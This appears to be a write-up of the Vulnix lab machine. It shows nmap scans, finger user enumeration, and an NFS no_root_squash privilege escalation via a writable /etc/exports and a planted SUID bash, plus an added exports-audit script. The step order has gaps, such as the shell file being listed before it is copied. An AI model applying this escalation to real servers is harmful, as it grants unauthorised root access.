```
root@kali:~# nmap -sn -v 192.168.66.*
Nmap scan report for 192.168.66.18
Host is up (0.00018s latency).
MAC Address: 00:0C:29:6C:D6:66 (VMware)
```
```
root@kali:~# nmap -sV -v -p- 192.168.66.18
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
79/tcp    open  finger     Linux fingerd
110/tcp   open  pop3?
111/tcp   open  rpcbind    2-4 (RPC #100000)
143/tcp   open  imap       Dovecot imapd
512/tcp   open  exec       netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
993/tcp   open  ssl/imaps?
995/tcp   open  ssl/pop3s?
2049/tcp  open  nfs_acl    2-3 (RPC #100227)
39832/tcp open  mountd     1-3 (RPC #100005)
42471/tcp open  status     1 (RPC #100024)
45506/tcp open  nlockmgr   1-4 (RPC #100021)
52840/tcp open  mountd     1-3 (RPC #100005)
53613/tcp open  mountd     1-3 (RPC #100005)
```
```
root@kali:~# finger @192.168.66.18
No one logged on.

root@kali:~# finger root@192.168.66.18
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
Never logged in.
No mail.
No Plan.

root@kali:~# finger user@192.168.66.18
Login: user                             Name: user
Directory: /home/user                   Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull                         Name: Dovecot login user
Directory: /nonexistent                 Shell: /bin/false
Never logged in.
No mail.
No Plan.

root@kali:~# finger vulnix@192.168.66.18
Login: vulnix                           Name:
Directory: /home/vulnix                 Shell: /bin/bash
Never logged in.
No mail.
No Plan.
```
```
root@kali:~# ssh user@192.168.66.18
The authenticity of host '192.168.66.18 (192.168.66.18)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.66.18' (ECDSA) to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa':
user@192.168.66.18's password:
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Thu Apr 16 03:53:37 BST 2020

  System load:  0.0               Processes:           89
  Usage of /:   90.2% of 773MB    Users logged in:     0
  Memory usage: 7%                IP address for eth0: 192.168.66.18
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

user@vulnix:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),100(users)
user@vulnix:~$ whoami
user
user@vulnix:~$ pwd
/home/user
user@vulnix:~$ uname -a
Linux vulnix 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
```
```
  System information as of Thu Apr 16 04:23:19 BST 2020

  System load:  0.0               Processes:           92
  Usage of /:   90.2% of 773MB    Users logged in:     1
  Memory usage: 9%                IP address for eth0: 192.168.66.18
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
```
Good: vulnix is allowed to run sudoedit on /etc/exports as root, and without a password. That is a root-level write to the NFS access control list, so it decides which hosts may mount /home/vulnix and whether a remote root is squashed. This is what the file contains:
```
vulnix@vulnix:~$ sudoedit /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
```
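The line that matters is the last one: /home/vulnix is exported to every host (`*`) read-write, with `root_squash`, which maps a remote root to the anonymous user. Because sudoedit lets vulnix rewrite this file as root, that option is under the attacker's control. The script below is an added example, not part of the original writeup, that audits an exports(5) file for exactly these two conditions: writable exports open to the world, and exports that do not squash root. The sample file it builds is constructed for the demonstration, and the verdict labels (ok, WARN, CRITICAL) are this script's own convention.

```shell
#!/bin/sh
# Added example: audit an exports(5) file for world-mountable writable exports
# and for exports that do not squash root. Not part of the original writeup.
#
# exports(5) grammar (simplified): <path> <client>(opt,opt,...) [<client>(opts) ...]
#   - access defaults to ro; rw must be spelled out
#   - root_squash is the default; no_root_squash must be spelled out
# The verdict labels (ok / WARN / CRITICAL) are this script's own convention.

# exports_audit FILE
# Prints one line per (path, client):
#   "<path> <client> <ro|rw> <squash|NO_SQUASH> <verdict>"
exports_audit() {
    # drop comments and blank lines before parsing
    sed -e 's/#.*//' -e '/^[[:space:]]*$/d' "$1" |
    (
        set -f   # no globbing: a client of '*' must stay literal, not expand to filenames
        while read -r path clients; do
            if [ -z "$clients" ]; then
                printf '%s (no client list)\n' "$path"
                continue
            fi
            for spec in $clients; do
                client="${spec%%\(*}"          # everything before the '('
                opts=""
                case "$spec" in
                    *\(*\)) opts="${spec#*\(}"; opts="${opts%\)}" ;;
                esac
                access=ro
                squash=squash
                case ",$opts," in *,rw,*) access=rw ;; esac
                case ",$opts," in *,no_root_squash,*) squash=NO_SQUASH ;; esac

                verdict=ok
                if [ "$squash" = NO_SQUASH ] && [ "$access" = rw ]; then
                    # a remote root can create root-owned SUID files on the server
                    verdict=CRITICAL
                elif [ "$client" = '*' ] && [ "$access" = rw ]; then
                    # anyone can mount and write, but only as an unprivileged uid
                    verdict=WARN
                fi
                printf '%s %s %s %s %s\n' "$path" "$client" "$access" "$squash" "$verdict"
            done
        done
    )
}

# Constructed sample for the demonstration: the first export is the line seen on
# Vulnix, the second is what it becomes once no_root_squash is added, the third
# is the example from the stock /etc/exports comments.
demo_exports_audit() {
    tmp=$(mktemp) || return 1
    cat > "$tmp" <<'EOF'
# /etc/exports: constructed sample, not a real host's file
/home/vulnix *(rw,root_squash)
/home/vulnix *(rw,no_root_squash)
/srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
EOF
    exports_audit "$tmp"
    rm -f "$tmp"
}

demo_exports_audit
```

Run it against a real server's /etc/exports (or against the output of `showmount -e` rewritten into the same shape) and anything marked CRITICAL is a share on which a root user on any client that may mount it can plant a root-owned SUID binary; WARN is a share anyone can write to but only as a squashed, unprivileged uid, which is the state the Vulnix export starts in.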
```
root@kali:~# ping -c 4 192.168.66.18
PING 192.168.66.18 (192.168.66.18) 56(84) bytes of data.
64 bytes from 192.168.66.18: icmp_seq=1 ttl=64 time=1.04 ms
64 bytes from 192.168.66.18: icmp_seq=2 ttl=64 time=0.279 ms
64 bytes from 192.168.66.18: icmp_seq=3 ttl=64 time=0.482 ms
64 bytes from 192.168.66.18: icmp_seq=4 ttl=64 time=0.492 ms

--- 192.168.66.18 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3033ms
rtt min/avg/max/mdev = 0.279/0.572/1.037/0.281 ms
```
Then mount the share again:
```
root@kali:~# mount 192.168.66.18:/home/vulnix /mnt/vulnix
root@kali:~# cd /mnt/vulnix
root@kali:/mnt/vulnix# ls
local_shell
```
Once the share is mounted, a copy of the victim's local shell is placed on it, its owner is changed to root and the SUID bit is set. This only works if the export no longer squashes root: under root_squash, which the original /home/vulnix line sets explicitly, writes from root on Kali arrive on the server as the anonymous user and the chown to root fails, so the export has to be changed to no_root_squash and re-exported first.
On the victim machine, as "vulnix":
```
vulnix@vulnix:~$ cp /bin/bash local_shell
vulnix@vulnix:~$ ls
local_shell
```